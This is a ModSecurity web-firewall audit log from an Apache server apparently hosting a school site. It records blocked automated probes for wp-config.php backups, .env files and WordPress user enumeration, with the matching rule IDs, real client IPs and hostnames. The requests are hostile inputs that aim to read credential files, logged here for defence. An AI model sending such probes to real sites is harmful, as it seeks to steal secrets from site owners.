Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c867964-Z-- --0a32cc26-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9wAAAFM 103.236.140.4 38518 103.236.140.4 8181 --0a32cc26-B-- GET /wp-config.php1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0a32cc26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a32cc26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909904777 718 (- - -) Stopwatch2: 1745151909904777 718; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a32cc26-Z-- --4733b275-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ-QAAAEA 103.236.140.4 38524 103.236.140.4 8181 --4733b275-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4733b275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4733b275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909975843 661 (- - -) Stopwatch2: 1745151909975843 661; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4733b275-Z-- --cb17ad2d-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-gAAAFg 103.236.140.4 38526 103.236.140.4 8181 --cb17ad2d-B-- GET /wp-config.phpold HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cb17ad2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb17ad2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910053718 630 (- - -) Stopwatch2: 1745151910053718 630; combined=242, p1=215, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb17ad2d-Z-- --7d80ef27-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-wAAAFQ 103.236.140.4 38528 103.236.140.4 8181 --7d80ef27-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --7d80ef27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d80ef27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910123424 628 (- - -) Stopwatch2: 1745151910123424 628; combined=243, p1=216, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d80ef27-Z-- --d468bb40-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_AAAAFA 103.236.140.4 38530 103.236.140.4 8181 --d468bb40-B-- GET /wordpress/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d468bb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d468bb40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910192670 648 (- - -) Stopwatch2: 1745151910192670 648; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d468bb40-Z-- --9a1cc968-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_QAAAFI 103.236.140.4 38532 103.236.140.4 8181 --9a1cc968-B-- GET /wp/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --9a1cc968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a1cc968-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910262673 665 (- - -) Stopwatch2: 1745151910262673 665; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a1cc968-Z-- --ad059132-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_gAAAEw 103.236.140.4 38534 103.236.140.4 8181 --ad059132-B-- GET /test/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ad059132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad059132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910332191 806 (- - -) Stopwatch2: 1745151910332191 806; combined=293, p1=256, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad059132-Z-- --a76ceb46-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_wAAAE8 103.236.140.4 38536 103.236.140.4 8181 --a76ceb46-B-- GET /blog/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a76ceb46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76ceb46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910402196 714 (- - -) Stopwatch2: 1745151910402196 714; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76ceb46-Z-- --939f7016-A-- [20/Apr/2025:19:57:07 +0700] aATvI8TCDeBrh52UaHTABAAAAI4 103.236.140.4 45954 103.236.140.4 8181 --939f7016-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.36.26 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.36.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --939f7016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --939f7016-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745153827634630 710 (- - -) Stopwatch2: 1745153827634630 710; combined=298, p1=255, p2=0, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --939f7016-Z-- --15ea0040-A-- [20/Apr/2025:20:21:56 +0700] aAT09Fu16wJWB6g0mU8RiQAAAA8 103.236.140.4 52220 103.236.140.4 8181 --15ea0040-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; YS900) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Iron Safari/537.36 Accept-Charset: utf-8 --15ea0040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15ea0040-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745155316875199 757 (- - -) Stopwatch2: 1745155316875199 757; combined=310, p1=278, p2=0, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15ea0040-Z-- --671ab07b-A-- [20/Apr/2025:20:35:32 +0700] aAT4JFu16wJWB6g0mU8TgwAAABQ 103.236.140.4 57628 103.236.140.4 8181 --671ab07b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --671ab07b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --671ab07b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745156132216221 783 (- - -) Stopwatch2: 1745156132216221 783; combined=331, p1=295, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --671ab07b-Z-- --93057804-A-- [20/Apr/2025:20:40:00 +0700] aAT5MEAzeWrUIk0gvAswwAAAAMo 103.236.140.4 58668 103.236.140.4 8181 --93057804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --93057804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93057804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745156400673119 4510 (- - -) Stopwatch2: 1745156400673119 4510; combined=2177, p1=720, p2=1424, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93057804-Z-- --7906e57e-A-- [20/Apr/2025:20:44:03 +0700] aAT6I1u16wJWB6g0mU8UNgAAAAc 103.236.140.4 60438 103.236.140.4 8181 --7906e57e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7906e57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7906e57e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745156643493209 840 (- - -) Stopwatch2: 1745156643493209 840; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7906e57e-Z-- --7da57112-A-- [20/Apr/2025:21:00:22 +0700] aAT99kAzeWrUIk0gvAsynAAAAMA 103.236.140.4 36666 103.236.140.4 8181 --7da57112-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --7da57112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7da57112-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745157622877618 731 (- - -) Stopwatch2: 1745157622877618 731; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7da57112-Z-- --9d57f26a-A-- [20/Apr/2025:21:07:02 +0700] aAT_hkAzeWrUIk0gvAszBQAAAMY 103.236.140.4 38230 103.236.140.4 8181 --9d57f26a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 209.38.248.17 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9d57f26a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d57f26a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745158022417490 876 (- - -) Stopwatch2: 1745158022417490 876; combined=345, p1=295, p2=0, p3=0, p4=0, p5=50, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d57f26a-Z-- --d2bf5f4d-A-- [20/Apr/2025:22:06:22 +0700] aAUNbkAzeWrUIk0gvAs17QAAAMg 103.236.140.4 51878 103.236.140.4 8181 --d2bf5f4d-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d2bf5f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2bf5f4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161582487614 886 (- - -) Stopwatch2: 1745161582487614 886; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2bf5f4d-Z-- --4ed7127e-A-- [20/Apr/2025:22:06:24 +0700] aAUNcEAzeWrUIk0gvAs17wAAAM4 103.236.140.4 51888 103.236.140.4 8181 --4ed7127e-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4ed7127e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed7127e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161584025889 874 (- - -) Stopwatch2: 1745161584025889 874; combined=339, p1=279, p2=0, p3=0, p4=0, p5=60, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed7127e-Z-- --319ff07e-A-- [20/Apr/2025:22:06:25 +0700] aAUNcUAzeWrUIk0gvAs18QAAAM0 103.236.140.4 51894 103.236.140.4 8181 --319ff07e-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --319ff07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --319ff07e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161585510354 787 (- - -) Stopwatch2: 1745161585510354 787; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319ff07e-Z-- --b457d452-A-- [20/Apr/2025:22:06:27 +0700] aAUNc8TCDeBrh52UaHTIGgAAAIs 103.236.140.4 51900 103.236.140.4 8181 --b457d452-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b457d452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b457d452-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161587045481 1002 (- - -) Stopwatch2: 1745161587045481 1002; combined=330, p1=296, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
